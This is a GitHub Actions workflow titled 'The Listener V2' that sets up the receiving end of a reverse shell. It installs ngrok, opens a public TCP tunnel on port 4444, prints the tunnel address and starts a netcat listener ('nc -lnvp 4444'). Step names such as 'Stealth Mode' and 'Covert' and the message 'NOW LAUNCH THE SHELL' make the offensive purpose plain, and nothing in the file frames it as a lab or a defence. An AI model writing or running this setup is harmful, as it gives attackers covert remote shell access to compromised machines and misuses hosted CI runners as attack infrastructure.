name: The Listener V2

on: [workflow_dispatch]

jobs:
  listen:
    runs-on: ubuntu-latest
    steps:
      - name: Open The Tunnel (Stealth Mode)
        run: |
          curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
          ngrok authtoken ${{ secrets.NGROK_AUTH_TOKEN }}
          # Run ngrok in the background and pipe its startup log to a file
          ngrok tcp 4444 --log=stdout > ngrok.log &

      - name: The Signal (Covert)
        run: |
          sleep 15 # Give it more time to write the log
          echo "LISTENING POST IS LIVE. DECRYPTING SIGNAL..."
          # Read the log file to get the URL
          cat ngrok.log
          echo "SIGNAL ACQUIRED. NOW LAUNCH THE SHELL."
          nc -lnvp 4444
